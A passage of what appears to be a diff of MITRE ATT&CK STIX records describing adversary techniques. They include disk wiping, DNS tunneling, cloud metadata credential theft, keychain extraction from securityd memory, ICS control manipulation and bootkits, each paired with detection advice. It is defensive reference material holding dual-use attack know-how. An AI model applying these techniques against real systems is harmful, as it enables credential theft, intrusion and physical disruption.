a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", + "created": "2020-10-01T02:14:18.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1588/004", + "external_id": "T1588.004" + }, + { + "source_name": "DiginotarCompromise", + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", + "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + }, + { + "source_name": "Let's Encrypt FAQ", + "description": "Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved October 15, 2020.", + "url": "https://letsencrypt.org/docs/faq/" + }, + { + "source_name": "Splunk Kovar Certificates 2017", + "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", + "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html" + }, + { + "source_name": "Recorded Future Beacon Certificates", + "description": "Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.", + "url": "https://www.recordedfuture.com/cobalt-strike-servers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "DNS Server", + "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", + "created": "2020-10-01T00:40:45.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583/002", + "external_id": "T1583.002" + }, + { + "source_name": "Unit42 DNS Mar 2019", + "description": "Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can be (ab)used by malicious actors. Retrieved October 3, 2020.", + "url": "https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Disk Wipe", + "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)\n\nOn network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "created": "2020-02-20T22:02:20.372Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1561", + "external_id": "T1561" + }, + { + "source_name": "erase_cmd_cisco", + "description": "Cisco. (2022, August 16). erase - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463" + }, + { + "source_name": "Novetta Blockbuster Destructive Malware", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", + "url": "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + }, + { + "source_name": "Microsoft Sysmon v6 May 2017", + "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-12-26T20:54:38.721Z", + "name": "DNS", + "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jan Petrov, Citi", + "Chris Heald" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "created": "2020-03-15T16:27:31.768Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1071/004", + "external_id": "T1071.004" + }, + { + "source_name": "Medium DnsTunneling", + "description": "Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020.", + "url": "https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "PAN DNS Tunneling", + "description": "Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020.", + "url": "https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:56:59.593Z", + "name": "Activate Firmware Update Mode", + "description": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0800", + "external_id": "T0800" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-21T13:56:27.910Z", + "name": "Cloud Instance Metadata API", + "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3", + "created": "2020-02-11T18:47:46.619Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1552/005", + "external_id": "T1552.005" + }, + { + "source_name": "AWS Instance Metadata API", + "description": "AWS. (n.d.). Instance Metadata and User Data. Retrieved July 18, 2019.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html" + }, + { + "source_name": "RedLock Instance Metadata API 2018", + "description": "Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.", + "url": "https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse" + }, + { + "source_name": "Krebs Capital One August 2019", + "description": "Krebs, B.. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020.", + "url": "https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-29T16:37:34.772Z", + "name": "Securityd Memory", + "description": "An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)\n\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s `securityd` utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", + "created": "2020-02-12T18:56:31.051Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1555/002", + "external_id": "T1555.002" + }, + { + "source_name": "External to DA, the OS X Way", + "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", + "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way" + }, + { + "source_name": "Apple Dev SecurityD", + "description": "Apple. (n.d.). Security Server and Security Agent. Retrieved March 29, 2024.", + "url": "https://developer.apple.com/library/archive/documentation/Security/Conceptual/Security_Overview/Architecture/Architecture.html" + }, + { + "source_name": "OS X Keychain", + "description": "Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved July 15, 2017.", + "url": "http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain" + }, + { + "source_name": "OSX Keydnap malware", + "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", + "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:56:59.793Z", + "name": "Manipulation of Control", + "description": "Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. \n\nMethods of Manipulation of Control include: \n\n* Man-in-the-middle \n* Spoof command message \n* Changing setpoints \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. (Citation: Shelley Smith February 2008) The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact. (Citation: Bruce Schneier January 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0831", + "external_id": "T0831" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Group Policy Discovery", + "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)\n\nAdversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain or Tenant Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Ted Samuels, Rapid7", + "Jonhnathan Ribeiro, 3CORESec, @_w0rk3r" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor for suspicious use of gpresult. Monitor for the use of PowerShell functions such as Get-DomainGPO and Get-DomainGPOLocalGroup and processes spawning with command-line arguments containing GPOLocalGroup.\n\nMonitor for abnormal LDAP queries with filters for groupPolicyContainer and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b", + "created": "2021-08-06T13:10:12.916Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1615", + "external_id": "T1615" + }, + { + "source_name": "ADSecurity GPO Persistence 2016", + "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.", + "url": "https://adsecurity.org/?p=2716" + }, + { + "source_name": "Microsoft gpresult", + "description": "Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult" + }, + { + "source_name": "Github PowerShell Empire", + "description": "Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.", + "url": "https://github.com/PowerShellEmpire/Empire" + }, + { + "source_name": "TechNet Group Policy Basics", + "description": "srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.", + "url": "https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:56:59.992Z", + "name": "Denial of Service", + "description": "Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. \n\nSome ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) \n\nAdversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. \n\nAdversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0814", + "external_id": "T0814" + }, + { + "source_name": "Common Weakness Enumeration January 2019", + "description": "Common Weakness Enumeration 2019, January 03 CWE-400: Uncontrolled Resource Consumption Retrieved. 2019/03/14 ", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "source_name": "ICS-CERT April 2017", + "description": "ICS-CERT 2017, April 18 CS Alert (ICS-ALERT-17-102-01A) BrickerBot Permanent Denial-of-Service Attack Retrieved. 2019/10/24 ", + "url": "https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 27 Advisory (ICSA-15-202-01) - Siemens SIPROTEC Denial-of-Service Vulnerability Retrieved. 2019/03/14 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01" + }, + { + "source_name": "MITRE March 2018", + "description": "MITRE 2018, March 22 CVE-2015-5374 Retrieved. 2019/03/14 ", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5374" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:47.417Z", + "name": "Bootkit", + "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host intrusion prevention systems", + "Anti-virus", + "File monitoring" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "created": "2019-12-19T21:05:38.123Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/003", + "external_id": "T1542.003" + }, + { + "source_name": "Mandiant M Trends 2016", + "description": "Mandiant. 